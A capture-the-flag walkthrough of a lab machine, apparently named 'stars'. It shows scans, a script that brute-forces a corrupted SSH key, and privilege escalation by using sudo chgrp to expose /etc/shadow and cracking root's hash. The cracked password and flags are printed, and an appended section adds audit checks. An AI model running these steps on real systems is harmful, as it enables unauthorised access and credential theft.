stars

Posted by C0rr3ct on 2024-05-30

⏲️ Release Date // 2021-10-20

✔️ MD5 // f9f5956724247267946fce4d78ac1e4e

☠ Root // 117

💀 User // 115

Host discovery and nmap scan

Full port scan

nmap -sT --min-rate 8000 -p- 192.168.56.128
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Targeted port scan

nmap -sT -sV -sC -O -p22,80 192.168.56.128
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
|   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Cours PHP & MySQ

Web penetration

Visit the web page

Under construction...

but not empty

Directory scan

gobuster dir -u http://192.168.56.128 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/sshnote.txt          (Status: 200) [Size: 117]

Visit /sshnote.txt

My RSA key is messed up, it looks like 3 capital letters have been replaced by stars.
Can you try to fix it?

sophie

We find a user name, sophie, and the note tells us that three capital letters in id_rsa have been replaced by *.

Inspect the cookie

cG9pc29uZWRnaWZ0LnR4dA==

Base64-decoding it gives poisonedgift.txt

Visiting that file returns the private key, with three letters missing


Brute-forcing the key

Generate all combinations of three capital letters

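crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > capital.txt

#!/bin/bash
# Write one candidate key per three-letter combination into keys/

KEYS4DIRECTORY=keys
LETTERS=capital.txt
CORRUPT_KEY=id_rsa

mkdir -p "$KEYS4DIRECTORY"

# Replace the "***" in the corrupted key with each candidate
while read -r i; do
    echo "$i"
    sed "s/\*\*\*/$i/" "$CORRUPT_KEY" > "$KEYS4DIRECTORY/$i.rsa"
done < "$LETTERS"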

Log in over SSH

#!/bin/bash
# Try each candidate key against the SSH service

KEYS4DIRECTORY=keys
LETTERS=capital.txt

# "Setting permissions"
echo 設定許可權
chmod 600 "$KEYS4DIRECTORY"/*

# "Checking keys"
echo 檢查key

for i in "$KEYS4DIRECTORY"/*; do
    ssh -i "$i" sophie@192.168.56.128
    echo "$i"
done

sophie@debian:~$ cat user.txt 
a99ac9055a3e60a8166cdfd746511852
sophie@debian:~$ sudo -l
Matching Defaults entries for sophie on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sophie may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/chgrp

Privilege escalation

chgrp can change the group ownership of directories and files

Change the group of the shadow file to sophie

sudo chgrp sophie /etc/shadow

Crack root's hash

root:$1$root$dZ6JC474uVpAeG8g0oh/7.:18917:0:99999:7:::
john hash --wordlist=/usr/share/wordlists/rockyou.txt

root:barbarita:18917:0:99999:7:::

Privilege escalation succeeded; we get root.txt

root@debian:~# cat root.txt 
bf3b0ba0d7ebf3a1bf6f2c452510aea2
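
Seen from the audit side, the sudo rule and the /etc/shadow group change used above can each be caught with a small check. This is an added example, not part of the original write-up; the function names, the list of flagged binaries and the extra benign sudo rule are assumptions made for illustration.

```shell
#!/bin/bash
# Added example (not from the original write-up): audit helpers for the
# misconfiguration used above.

# `sudo -l` output copied from the write-up, plus one constructed benign rule.
SAMPLE_SUDO_L='User sophie may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/chgrp
    (root) NOPASSWD: /usr/bin/systemctl status ssh'

# Reads `sudo -l` output on stdin and prints every NOPASSWD command that can
# change file ownership or mode (or is unrestricted). As root, any of these can
# put a root-only file such as /etc/shadow within an unprivileged user's reach.
flag_risky_sudo_rules() {
    grep 'NOPASSWD:' | sed 's/^.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' |
    while read -r cmd _args; do
        case "${cmd##*/}" in
            chgrp|chown|chmod|ALL) echo "$cmd" ;;
        esac
    done
}

# Succeeds if FILE belongs to group EXPECTED; otherwise reports the drift.
# Needs GNU stat (-c). Debian ships /etc/shadow as root:shadow, mode 0640,
# so the group-read bit follows whatever group chgrp assigns.
check_file_group() {
    file=$1
    expected=$2
    actual=$(stat -c '%G' -- "$file") || return 2
    if [ "$actual" != "$expected" ]; then
        echo "DRIFT: $file has group '$actual', expected '$expected'"
        return 1
    fi
}

printf '%s\n' "$SAMPLE_SUDO_L" | flag_risky_sudo_rules   # prints /usr/bin/chgrp
```

On a Debian host the second check would be run as `check_file_group /etc/shadow shadow`, for example from a scheduled integrity job.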